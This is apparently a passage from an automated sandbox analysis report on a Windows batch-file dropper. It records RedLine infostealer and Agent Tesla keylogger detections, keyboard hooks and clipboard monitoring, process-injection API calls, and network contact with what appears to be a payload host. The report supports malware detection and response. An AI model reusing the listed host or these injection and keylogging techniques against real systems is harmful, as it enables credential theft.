xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://himalayastrek.com/
Source: x.exe, 00000003.00000002.1721962152.000000000085E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://himalayastrek.com/-
Source: Cllyjbrx.PIF, 00000010.00000002.2030287886.0000000020F7D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://himalayastrek.com/origins/233_Cllyjbrxmng
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://himalayastrek.com/origins/233_CllyjbrxmngHA
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://himalayastrek.com/origins/233_CllyjbrxmngZ
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000064E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://himalayastrek.com/origins/233_Cllyjbrxmngy
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.0000000000669000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://himalayastrek.com:443/origins/233_Cllyjbrxmng
Source: x.exe, 00000003.00000002.1721962152.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.00000000008BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://himalayastrek.com:443/origins/233_CllyjbrxmngP
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, SKTzxzsJw.cs .Net Code: _71ZRqC1D
Source: C:\Users\Public\Libraries\xrbjyllC.pif Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif
Source: C:\Users\Public\Libraries\xrbjyllC.pif Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif
Source: C:\Users\Public\Libraries\xrbjyllC.pif Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window created: window name: CLIPBRDWNDCLASS
Source: Yara match File source: Process Memory Space: x.exe PID: 4888, type: MEMORYSTR

System Summary

Source: 9.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.1.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.1.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.2918780561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0000000B.00000002.2004085524.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000011.00000001.1996288631.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: z1Transaction_ID_REF2418_cmd.bat Static file information: 1139107
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D8670 NtUnmapViewOfSection, 3_2_031D8670
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D8400 NtReadVirtualMemory, 3_2_031D8400
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D7A2C NtAllocateVirtualMemory, 3_2_031D7A2C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D7D78 NtWriteVirtualMemory, 3_2_031D7D78
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 3_2_031D8D70
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 3_2_031DDD70
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 3_2_031DDC04
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 3_2_031DDC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 3_2_031DDBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D7A2A NtAllocateVirtualMemory, 3_2_031D7A2A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 3_2_031D8D6E
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031B8670 NtUnmapViewOfSection, 10_2_031B8670
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031B8400 NtReadVirtualMemory, 10_2_031B8400
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031B7A2C NtAllocateVirtualMemory, 10_2_031B7A2C
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031B7D78 NtWriteVirtualMemory, 10_2_031B7D78
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031B8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 10_2_031B8D70
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031BDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 10_2_031BDD70
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031B86F7 NtUnmapViewOfSection, 10_2_031B86F7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031BDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 10_2_031BDBB0
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031B7A2A NtAllocateVirtualMemory, 10_2_031B7A2A
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031B7AC9 NtAllocateVirtualMemory, 10_2_031B7AC9
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031B8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 10_2_031B8D6E
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031BDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 10_2_031BDC04
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 10_2_031BDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 10_2_031BDC8C
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031A8670 NtUnmapViewOfSection, 16_2_031A8670
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031A8400 NtReadVirtualMemory, 16_2_031A8400
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031A7A2C NtAllocateVirtualMemory, 16_2_031A7A2C
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031A7D78 NtWriteVirtualMemory, 16_2_031A7D78
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031A8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 16_2_031A8D70
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031ADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 16_2_031ADD70
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031A86F7 NtUnmapViewOfSection, 16_2_031A86F7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031ADBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 16_2_031ADBB0
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031A7A2A NtAllocateVirtualMemory, 16_2_031A7A2A
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031A7AC9 NtAllocateVirtualMemory, 16_2_031A7AC9
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031A8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 16_2_031A8D6E
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031ADC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 16_2_031ADC04
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Code function: 16_2_031ADC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 16_2_031ADC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D8788 CreateProcessAsUserW, 3_2_031D8788
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\xrbjyllC.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: String function: 0040A6C4 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 031C46D4 appears 244 times
